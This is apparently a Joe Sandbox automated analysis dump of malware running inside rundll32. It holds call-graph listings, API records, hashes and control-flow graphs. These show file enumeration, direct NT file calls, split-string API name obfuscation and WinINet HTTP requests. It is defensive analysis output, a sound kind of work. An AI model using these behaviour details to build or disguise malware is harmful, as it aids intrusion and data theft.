34637->34638 34639 f3bfad 34638->34639 34640 f4a450 2 API calls 34639->34640 34641 f3bfb7 34640->34641 34641->34543 34643 f3bae4 34642->34643 34646 f4a0a0 34643->34646 34647 f4af70 LdrLoadDll 34646->34647 34648 f4a0bc 34647->34648 34651 51e9b00 LdrInitializeThunk 34648->34651 34649 f3bb6b 34649->34627 34651->34649 34653 f449f8 34652->34653 34654 f3a4a0 LdrLoadDll 34653->34654 34655 f44a27 34654->34655 34656 f3b950 3 API calls 34655->34656 34658 f44a5a 34656->34658 34657 f44a61 34657->34552 34658->34657 34659 f3a4a0 LdrLoadDll 34658->34659 34660 f44a89 34659->34660 34661 f3a4a0 LdrLoadDll 34660->34661 34662 f44aad 34661->34662 34663 f3ba10 2 API calls 34662->34663 34664 f44ad1 34663->34664 34671 f44b13 34664->34671 34864 f44330 34664->34864 34666 f44aea 34667 f44c96 34666->34667 34868 f44720 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 34666->34868 34667->34552 34668 f3a4a0 LdrLoadDll 34670 f44b33 34668->34670 34672 f3ba10 2 API calls 34670->34672 34671->34668 34673 f44b57 34672->34673 34674 f44b9d 34673->34674 34676 f44b74 34673->34676 34677 f44330 8 API calls 34673->34677 34675 f3ba10 2 API calls 34674->34675 34679 f44bcd 34675->34679 34676->34667 34869 f44720 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 34676->34869 34677->34676 34680 f44c13 34679->34680 34681 f44bea 34679->34681 34682 f44330 8 API calls 34679->34682 34684 f3ba10 2 API calls 34680->34684 34681->34667 34870 f44720 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 34681->34870 34682->34681 34685 f44c72 34684->34685 34686 f44cbb 34685->34686 34687 f44c8f 34685->34687 34688 f44330 8 API calls 34685->34688 34686->34552 34687->34667 34871 f44720 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 34687->34871 34688->34687 34691 f43724 34690->34691 34692 f3a4a0 LdrLoadDll 34691->34692 34693 f437f1 34692->34693 34694 f3b950 3 API calls 34693->34694 34696 f43824 34694->34696 34695 f4382b 34695->34554 34696->34695 34697 
f3a4a0 LdrLoadDll 34696->34697 34698 f43853 34697->34698 34699 f3ba10 2 API calls 34698->34699 34700 f43893 34699->34700 34701 f439b3 34700->34701 34702 f44330 8 API calls 34700->34702 34701->34554 34703 f438b0 34702->34703 34704 f439c2 34703->34704 34872 f434e0 34703->34872 34705 f4a450 2 API calls 34704->34705 34707 f439cc 34705->34707 34707->34554 34708 f438c8 34708->34704 34709 f438d3 34708->34709 34710 f4c0c0 2 API calls 34709->34710 34711 f438fc 34710->34711 34712 f43905 34711->34712 34713 f4391b 34711->34713 34714 f4a450 2 API calls 34712->34714 34901 f433d0 CoInitialize 34713->34901 34716 f4390f 34714->34716 34716->34554 34717 f43929 34903 f4a160 34717->34903 34719 f439a2 34720 f4a450 2 API calls 34719->34720 34721 f439ac 34720->34721 34723 f4bef0 2 API calls 34721->34723 34723->34701 34724 f43947 34724->34719 34725 f4a160 2 API calls 34724->34725 34908 f43300 LdrLoadDll RtlFreeHeap 34724->34908 34725->34724 34727 f40908 34726->34727 34728 f4c0c0 2 API calls 34727->34728 34730 f40968 34728->34730 34729 f40971 34729->34556 34730->34729 34910 f405a0 34730->34910 34732 f40998 34733 f409b6 34732->34733 34945 f423a0 11 API calls 34732->34945 34738 f409d0 34733->34738 34947 f3a2a0 LdrLoadDll 34733->34947 34735 f409aa 34946 f423a0 11 API calls 34735->34946 34739 f405a0 10 API calls 34738->34739 34740 f409fb 34739->34740 34741 f40a1a 34740->34741 34948 f423a0 11 API calls 34740->34948 34743 f40a34 34741->34743 34950 f3a2a0 LdrLoadDll 34741->34950 34744 f4bef0 2 API calls 34743->34744 34747 f40a3e 34744->34747 34745 f40a0e 34949 f423a0 11 API calls 34745->34949 34747->34556 34750 f427d6 34749->34750 34751 f4286e 34750->34751 34752 f427e8 34750->34752 34757 f4284c 34751->34757 34966 f43a00 34751->34966 34753 f3a4a0 LdrLoadDll 34752->34753 34755 f427f9 34753->34755 34759 f3a4a0 LdrLoadDll 34755->34759 34761 f42817 34755->34761 34758 f42866 34757->34758 34971 f488a0 34757->34971 34758->34558 34759->34761 34760 f42900 34760->34558 34763 f3a4a0 LdrLoadDll 34761->34763 
34762 f428ab 34762->34760 34765 f4290c 34762->34765 34766 f428ca 34762->34766 34764 f4283b 34763->34764 34768 f456b0 8 API calls 34764->34768 34767 f3a4a0 LdrLoadDll 34765->34767 34769 f428d2 34766->34769 34770 f428ef 34766->34770 34771 f4291d 34767->34771 34768->34757 34772 f4bef0 2 API calls 34769->34772 34773 f4bef0 2 API calls 34770->34773 34997 f41be0 34771->34997 34774 f428e3 34772->34774 34773->34760 34774->34558 34776 f42a1f 34777 f4bef0 2 API calls 34776->34777 34778 f42a26 34777->34778 34778->34558 34779 f42937 34779->34776 35003 f422d0 9 API calls 34779->35003 34782 f427b0 11 API calls 34781->34782 34783 f3d3ab 34782->34783 34784 f417a0 34783->34784 34785 f417c2 34784->34785 34786 f3a4a0 LdrLoadDll 34785->34786 34787 f4198d 34786->34787 34788 f3a4a0 LdrLoadDll 34787->34788 34789 f4199e 34788->34789 34790 f3a370 LdrLoadDll 34789->34790 34791 f419b5 34790->34791 35005 f41670 34791->35005 34794 f41670 11 API calls 34795 f41a2b 34794->34795 34796 f41670 11 API calls 34795->34796 34797 f41a43 34796->34797 34798 f41670 11 API calls 34797->34798 34799 f41a5b 34798->34799 34800 f41670 11 API calls 34799->34800 34801 f41a73 34800->34801 34802 f41670 11 API calls 34801->34802 34803 f41a8e 34802->34803 34804 f41aa8 34803->34804 34805 f41670 11 API calls 34803->34805 34804->34562 34806 f41adc 34805->34806 34807 f41670 11 API calls 34806->34807 34808 f41b19 34807->34808 34809 f41670 11 API calls 34808->34809 34810 f41b56 34809->34810 34811 f41670 11 API calls 34810->34811 34812 f41b93 34811->34812 34813 f41670 11 API calls 34812->34813 34814 f41bd0 34813->34814 34814->34562 34816 f44059 34815->34816 34817 f3a150 LdrLoadDll 34816->34817 34818 f44088 34817->34818 34819 f45ab0 LdrLoadDll 34818->34819 34838 f44256 34818->34838 34820 f440b2 34819->34820 34821 f45ab0 LdrLoadDll 34820->34821 34822 f440c5 34821->34822 34823 f45ab0 LdrLoadDll 34822->34823 34824 f440d8 34823->34824 34825 f45ab0 LdrLoadDll 34824->34825 34826 f440eb 34825->34826 34827 f45ab0 LdrLoadDll 
34826->34827 34828 f44101 34827->34828 34829 f45ab0 LdrLoadDll 34828->34829 34830 f44114 34829->34830 34831 f45ab0 LdrLoadDll 34830->34831 34832 f44127 34831->34832 34833 f45ab0 LdrLoadDll 34832->34833 34834 f4413a 34833->34834 34835 f45ab0 LdrLoadDll 34834->34835 34836 f4414f 34835->34836 34837 f44330 8 API calls 34836->34837 34836->34838 34840 f441d1 34837->34840 34838->34564 34840->34838 35020 f43c10 LdrLoadDll 34840->35020 34842 f3f130 34841->34842 34845 f3f13b 34841->34845 34843 f4c0c0 2 API calls 34842->34843 34843->34845 35021 f3dc30 34845->35021 34846 f3f151 34846->34566 34848 f3f14a 34848->34846 34849 f3f170 34848->34849 35030 f3ecc0 34848->35030 34850 f3f188 34849->34850 34851 f4bef0 2 API calls 34849->34851 34850->34566 34851->34850 34853 f3f353 34852->34853 35049 f41d10 34853->35049 34855 f3f3b4 34858 f43a00 8 API calls 34855->34858 34856 f3f376 34856->34855 35058 f3f1a0 34856->35058 34859 f3f3d7 34858->34859 34860 f3f1a0 8 API calls 34859->34860 34861 f3f415 34859->34861 34860->34861 34862 f3f1a0 8 API calls 34861->34862 34863 f3d3e1 34862->34863 34863->34332 34865 f443ad 34864->34865 34866 f456b0 8 API calls 34865->34866 34867 f44529 34865->34867 34866->34867 34867->34666 34868->34671 34869->34674 34870->34680 34871->34686 34873 f434fc 34872->34873 34874 f3a150 LdrLoadDll 34873->34874 34875 f43517 34874->34875 34876 f43520 34875->34876 34877 f45ab0 LdrLoadDll 34875->34877 34876->34708 34878 f43537 34877->34878 34879 f45ab0 LdrLoadDll 34878->34879 34880 f4354c 34879->34880 34881 f45ab0 LdrLoadDll 34880->34881 34882 f4355f 34881->34882 34883 f45ab0 LdrLoadDll 34882->34883 34884 f43572 34883->34884 34885 f45ab0 LdrLoadDll 34884->34885 34886 f43588 34885->34886 34887 f45ab0 LdrLoadDll 34886->34887 34888 f4359b 34887->34888 34889 f3a150 LdrLoadDll 34888->34889 34891 f435c4 34889->34891 34890 f43660 34890->34708 34891->34890 34892 f45ab0 LdrLoadDll 34891->34892 34893 f435e8 34892->34893 34894 f3a150 LdrLoadDll 34893->34894 34895 f4361d 34894->34895 
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(?,00000000), ref: 00F4173F
                                                                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 00F4177E
                                                                                                            • FindClose.KERNEL32(?), ref: 00F41789
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 3541575487-0
                                                                                                            • Opcode ID: 63a4d5704ae68a6ee1ba8cb65f15542c9b7cd2edd9d749d76b4829906cc71f08
                                                                                                            • Instruction ID: 75becb4fff0e2d75883aa61d8170b319780bae7d1fadc13862c8bf06c6cea6b2
                                                                                                            • Opcode Fuzzy Hash: 63a4d5704ae68a6ee1ba8cb65f15542c9b7cd2edd9d749d76b4829906cc71f08
                                                                                                            • Instruction Fuzzy Hash: 37318475900348ABDB20DF64CC85FEB7F78AF44714F14459DBE09A7181E7B4AA889BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(?,00000000), ref: 00F4173F
                                                                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 00F4177E
                                                                                                            • FindClose.KERNEL32(?), ref: 00F41789
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 3541575487-0
                                                                                                            • Opcode ID: 6030c7ac88ae28657aba97c811ac57c097871a54f8334a171ac8116b0444eca7
                                                                                                            • Instruction ID: 269bcb30a7871f5e0a69fe6d91add75f78bf026cf8c914462725906c03d8d24e
                                                                                                            • Opcode Fuzzy Hash: 6030c7ac88ae28657aba97c811ac57c097871a54f8334a171ac8116b0444eca7
                                                                                                            • Instruction Fuzzy Hash: 613165759003087BDB20DF64CC85FEB7F7CAF44714F144599BE09A7181EBB4AA889BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • NtCreateFile.NTDLL(00000060,00000005,00000000,00F45817,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,00F45817,00000000,00000005,00000060,00000000,00000000), ref: 00F4A36D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 13972dcf1e80a6060fbfba47f86d76c3df8f2844d29591f854aae2ea4d140ddf
                                                                                                            • Instruction ID: b663dafab5e7ba8f73b8bb80c9b85ea3c2045e42b5bc27c69ef89b432aad01fa
                                                                                                            • Opcode Fuzzy Hash: 13972dcf1e80a6060fbfba47f86d76c3df8f2844d29591f854aae2ea4d140ddf
                                                                                                            • Instruction Fuzzy Hash: 5E21F8B6204108ABDB14DF88DC85EEB3BADEF8C754F118559BE4D9B242C630E8118BA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • NtCreateFile.NTDLL(00000060,00000005,00000000,00F45817,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,00F45817,00000000,00000005,00000060,00000000,00000000), ref: 00F4A36D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
                                                                                                            • Instruction ID: 0123f79be553251be673026e5d7db2c0ab156e97fcd7e4e936cb4b0e3342ef67
                                                                                                            • Opcode Fuzzy Hash: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
                                                                                                            • Instruction Fuzzy Hash: 9CF0BDB6200208AFCB08CF88DC85EEB37ADAF8C754F018208BA0997241C630F8518BA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • NtReadFile.NTDLL(00F459D2,5D9515B3,FFFFFFFF,00F45691,00000206,?,00F459D2,00000206,00F45691,FFFFFFFF,5D9515B3,00F459D2,00000206,00000000), ref: 00F4A415
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738559852-0
                                                                                                            • Opcode ID: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
                                                                                                            • Instruction ID: ab43be4044537cf8b5ca96123f5751cf317619c3ad945a72a2cf6416a06f44ea
                                                                                                            • Opcode Fuzzy Hash: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
                                                                                                            • Instruction Fuzzy Hash: 21F0A4B6200208ABDB14DF99DC85EEB77ADAF8C754F118248BE0D97251D630E811CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • NtCreateFile.NTDLL(00000060,00000005,00000000,00F45817,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,00F45817,00000000,00000005,00000060,00000000,00000000), ref: 00F4A36D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: be869cfb6ee2f69ba5ebec51d914e6aac7644c7b8c32f31d34b7451a482147f3
                                                                                                            • Instruction ID: 6f3ab1602451068a576618d5deed794a4943217bee00a6dd536a33030c0d87e0
                                                                                                            • Opcode Fuzzy Hash: be869cfb6ee2f69ba5ebec51d914e6aac7644c7b8c32f31d34b7451a482147f3
                                                                                                            • Instruction Fuzzy Hash: BAF0F4B6204149AFCB08CF98DC84CEB77ADEF8C354B05824CFA1C93201D630E851CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00F32D11,00002000,00003000,00000004), ref: 00F4A539
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2167126740-0
                                                                                                            • Opcode ID: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
                                                                                                            • Instruction ID: 207c6e003242a25a89ee8f053c3e75265070a99b2c01940b883c5a0a084e1d96
                                                                                                            • Opcode Fuzzy Hash: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
                                                                                                            • Instruction Fuzzy Hash: F9F015B6210208ABDB14DF89DC81EAB77ADAF8C754F018108BE0897241C630F810CBB0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • NtClose.NTDLL(00F459B0,00000206,?,00F459B0,00000005,FFFFFFFF), ref: 00F4A475
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close
                                                                                                            • String ID:
                                                                                                            • API String ID: 3535843008-0
                                                                                                            • Opcode ID: 8c0329030e001bdeff8e749bfdc14507ffaf8417d4be3d2efb3fafa8f1c184cf
                                                                                                            • Instruction ID: c8220929c7ecf6ab557212fd33dbce7f1d8389efa69d8db495e09b4657350db1
                                                                                                            • Opcode Fuzzy Hash: 8c0329030e001bdeff8e749bfdc14507ffaf8417d4be3d2efb3fafa8f1c184cf
                                                                                                            • Instruction Fuzzy Hash: CBE0EC76640150ABE715EBA4DC89E977B69DF44660F058095BD489F642C530E500C7E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • NtClose.NTDLL(00F459B0,00000206,?,00F459B0,00000005,FFFFFFFF), ref: 00F4A475
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close
                                                                                                            • String ID:
                                                                                                            • API String ID: 3535843008-0
                                                                                                            • Opcode ID: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
                                                                                                            • Instruction ID: 93a13d59b7dffef5143d98694e233bfec75bb20b720c402eab8acbe6e11d20cd
                                                                                                            • Opcode Fuzzy Hash: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
                                                                                                            • Instruction Fuzzy Hash: ADD01776240214ABE620EB98DC89E977BACDF48660F018055BE485B242C530FA0086E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: caeef0ada81b0ab8b287b06589a00f1a1bbf5853f3b101cf3d53adb448dd8c43
                                                                                                            • Instruction ID: 1517cc40154bf8c30a44feff290a08fcdc8e4480b9baf7615f1debfc0d9db02c
                                                                                                            • Opcode Fuzzy Hash: caeef0ada81b0ab8b287b06589a00f1a1bbf5853f3b101cf3d53adb448dd8c43
                                                                                                            • Instruction Fuzzy Hash: 10900265211000030105A5591744517005697D5395392C425F2006550CD76588617261
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 775fbfd5286ab9b718c71b62df81b36b29eb3a012d230a48acecb690c82317d2
                                                                                                            • Instruction ID: dd7aeb9aedc05f2b010323ea5345902a75e88169fcee4474c962c62b9ede5718
                                                                                                            • Opcode Fuzzy Hash: 775fbfd5286ab9b718c71b62df81b36b29eb3a012d230a48acecb690c82317d2
                                                                                                            • Instruction Fuzzy Hash: 529002A120200003410571595554626401A97E0245B92C425E2005590DC66988917265
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: d341c0ce4a6099d0cf529f87182f158761a063f88f5f33223c201e19ea0857e4
                                                                                                            • Instruction ID: 1bef51ecc1570db8757f0432556d384fb92b14d33513c6bed5a0ec5241c5a7fa
                                                                                                            • Opcode Fuzzy Hash: d341c0ce4a6099d0cf529f87182f158761a063f88f5f33223c201e19ea0857e4
                                                                                                            • Instruction Fuzzy Hash: 6B90027120100402D10065996548656001597E0345F92D415A6015555EC7A988917271
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00F3EE72
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID: $D$P$\$\$\$a$a$a$a$e$i$l$m$n$o$s$t
                                                                                                            • API String ID: 3188754299-3665197332
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00F3EE72
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID: $D$P$\$\$\$a$a$a$a$e$i$l$m$n$o$s$t
                                                                                                            • API String ID: 3188754299-3665197332
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 399 f4a9a5-f4a9a6 400 f4a963-f4a964 399->400 401 f4a9a8-f4a9d1 399->401 403 f4a9d4 400->403 404 f4a966 400->404 402 f4a9d3 401->402 402->403 405 f4aa44-f4aa76 call f4b080 402->405 403->405 406 f4a9d6 403->406 407 f4a930-f4a937 404->407 408 f4a969-f4a96c 404->408 420 f4aa9f-f4aaa5 405->420 421 f4aa78-f4aa9e 405->421 409 f4a9a0-f4a9a4 406->409 410 f4a9d8-f4a9e6 406->410 408->402 412 f4a96e-f4a981 call f4b080 408->412 413 f4a9ef-f4a9f6 410->413 414 f4a9ea call f4b080 410->414 423 f4a983-f4a99d InternetOpenA 412->423 424 f4a99e 412->424 418 f4aa1f-f4aa25 413->418 419 f4a9f8-f4aa1e InternetConnectA 413->419 414->413 424->409
                                                                                                            APIs
                                                                                                            • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00F4A997
                                                                                                            • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 00F4AA18
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Internet$ConnectOpen
                                                                                                            • String ID: A$Conn$ConnectA$Http$HttpOpenRequestA$Inte$InternetConnectA$InternetOpenA$Open$OpenRequestA$Requ$RequestA$ectA$estA$rnet$rnetConnectA$rnetOpenA
                                                                                                            • API String ID: 2790792615-2564058935
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 426 f4aaa8-f4aaad 427 f4ab21-f4ab66 call f4b080 426->427 428 f4aaaf 426->428 435 f4ab7f-f4ab85 427->435 436 f4ab68-f4ab7e 427->436 430 f4ab06-f4ab12 HttpSendRequestA 428->430 431 f4aab1-f4aae6 428->431 433 f4aaef-f4aaf6 431->433 434 f4aaea call f4b080 431->434 437 f4ab13-f4ab19 433->437 438 f4aaf8-f4ab05 433->438 434->433 438->430
                                                                                                            APIs
                                                                                                            • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00F4AB0C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: HttpRequestSend
                                                                                                            • String ID: File$File$Http$HttpSendRequestA$HttpSendRequestA$Inte$InternetReadFile$Read$ReadFile$Requ$RequestA$Send$SendRequestA$estA$rnet$rnetReadFile
                                                                                                            • API String ID: 360639707-998580104
                                                                                                            Uniqueness

